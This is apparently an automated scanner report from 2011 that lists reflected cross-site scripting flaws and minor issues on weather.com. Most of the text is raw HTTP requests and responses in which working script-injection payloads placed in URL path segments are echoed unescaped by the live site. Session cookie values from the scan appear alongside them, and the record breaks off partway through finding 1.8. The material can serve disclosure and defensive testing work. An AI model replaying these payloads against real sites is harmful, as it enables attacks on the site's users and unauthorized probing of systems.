XSS, DORK, weather.com, Cross Site Scripting, CWE-79, CAPEC-86 CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading
1. Cross-site scripting (reflected)
1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]
1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]
1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]
1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]
1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]
1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]
1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]
1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]
1.9. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]
1.10. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 2]
1.11. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]
1.12. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 1]
1.13. http://www.weather.com/pagelet/bc/62264 [REST URL parameter 2]
1.14. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]
1.15. http://www.weather.com/pagelet/loc/ [REST URL parameter 1]
1.16. http://www.weather.com/pagelet/loc/ [REST URL parameter 2]
1.17. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]
1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]
1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]
1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]
1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
1.27. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
1.28. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]
1.29. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
1.30. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]
1.31. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.32. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.33. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]
1.34. http://www.weather.com/weather-apps/ [REST URL parameter 1]
1.35. http://www.weather.com/weather-apps/ [REST URL parameter 1]
2. Password field with autocomplete enabled
2.1. http://www.weather.com/activities/driving/rushhour/
2.2. http://www.weather.com/services/desktop.html
2.3. http://www.weather.com/weather/health/beauty/
3. Source code disclosure
3.1. http://www.weather.com/activities/driving/rushhour/
3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
3.3. http://www.weather.com/services/desktop.html
4. Cross-domain Referer leakage
4.1. http://www.weather.com/common/a21/makeRequest-2_3.html
4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
4.3. http://www.weather.com/pagelet/apps/traffic/
4.4. http://www.weather.com/pagelet/bc/56967
4.5. http://www.weather.com/pagelet/bc/59233
4.6. http://www.weather.com/pagelet/bc/62264
5. Cross-domain script include
5.1. http://www.weather.com/
5.2. http://www.weather.com/activities/driving/rushhour/
5.3. http://www.weather.com/common/a21/makeRequest-2_3.html
5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html
5.5. http://www.weather.com/pagelet/apps/traffic/
5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
5.8. http://www.weather.com/services/desktop.html
5.9. http://www.weather.com/weather-apps/
5.10. http://www.weather.com/weather/health/beauty/
6. Private IP addresses disclosed
6.1. http://www.weather.com/activities/driving/rushhour/
6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html
6.3. http://www.weather.com/services/desktop.html
6.4. http://www.weather.com/weather/health/beauty/
6.5. http://www.weather.com/weather/health/beauty/
7. Content type incorrectly stated
7.1. http://www.weather.com/pagelet/loc/
7.2. http://www.weather.com/pagelet/metrics/
1. Cross-site scripting (reflected)
next
There are 35 instances of this issue:
1.1. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea46"><script>alert(1)</script>7740e17c9d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /pageletdea46"><script>alert(1)</script>7740e17c9d7 /apps/traffic/?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 200 OK Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:15 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x04 X-Varnish: 624701992 Date: Thu, 24 Mar 2011 17:40:45 GMT Connection: keep-alive Content-Length: 159969 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pageletdea46"><script>alert(1)</script>7740e17c9d7 /apps/traffic/" />...[SNIP]...
1.2. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60609"-alert(1)-"07f39498de7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /pagelet60609"-alert(1)-"07f39498de7 /apps/traffic/?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 200 OK Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:21 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x06 X-Varnish: 1510931970 Date: Thu, 24 Mar 2011 17:40:51 GMT Connection: keep-alive Content-Length: 159886 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet60609"-alert(1)-"07f39498de7 /apps/traffic/", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/...[SNIP]...
1.3. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16a65"-alert(1)-"f0591b460e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /pagelet/apps16a65"-alert(1)-"f0591b460e3 /traffic/?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:45:55 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x02 X-Varnish: 1156436827 Date: Thu, 24 Mar 2011 17:40:55 GMT Connection: keep-alive Content-Length: 108354 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/apps16a65"-alert(1)-"f0591b460e3 /traffic/", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011"...[SNIP]...
1.4. http://www.weather.com/pagelet/apps/traffic/ [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9696c"-alert(1)-"545c7e9406c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c /?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:46:00 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x03 X-Varnish: 1510934940 Date: Thu, 24 Mar 2011 17:41:00 GMT Connection: keep-alive Content-Length: 108353 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/apps/traffic9696c"-alert(1)-"545c7e9406c /", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.5. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/56967
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f6"><script>alert(1)</script>1529b7c1906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pageletb51f6"><script>alert(1)</script>1529b7c1906 /bc/56967? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:35:56 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x04 X-Varnish: 1156332345 Date: Thu, 24 Mar 2011 17:35:26 GMT Connection: keep-alive Content-Length: 159912 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="canonical" href="http://www.weather.com/pageletb51f6"><script>alert(1)</script>1529b7c1906 /bc/56967" />...[SNIP]...
1.6. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/56967
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd82"-alert(1)-"370523ec97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet8cd82"-alert(1)-"370523ec97 /bc/56967? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:36:01 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x07 X-Varnish: 2184623889 Date: Thu, 24 Mar 2011 17:35:31 GMT Connection: keep-alive Content-Length: 159760 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... tch(/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "62287", pageURL: "/pagelet8cd82"-alert(1)-"370523ec97 /bc/56967", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011"...[SNIP]...
1.7. http://www.weather.com/pagelet/bc/56967 [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/56967
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85c3d"-alert(1)-"a5d5445c482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagelet/bc85c3d"-alert(1)-"a5d5445c482 /56967? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:40:36 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x07 X-Varnish: 1096913262 Date: Thu, 24 Mar 2011 17:35:36 GMT Connection: keep-alive Content-Length: 108349 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... (/beta/)) { serverEnv = ["beta:",replEnvStr].join(""); } else { serverEnv = ["live:",replEnvStr].join(""); } wx.config.page = { pageId: "60990", pageURL: "/pagelet/bc85c3d"-alert(1)-"a5d5445c482 /56967", locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "", locType: "", locName: "", countryCode: "", serverdate: "3/24/2011", ...[SNIP]...
1.8. http://www.weather.com/pagelet/bc/59233 [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/59233
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0323"><script>alert(1)</script>8da94951a16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pageletd0323"><script>alert(1)</script>8da94951a16 /bc/59233? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/services/desktop.html X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; 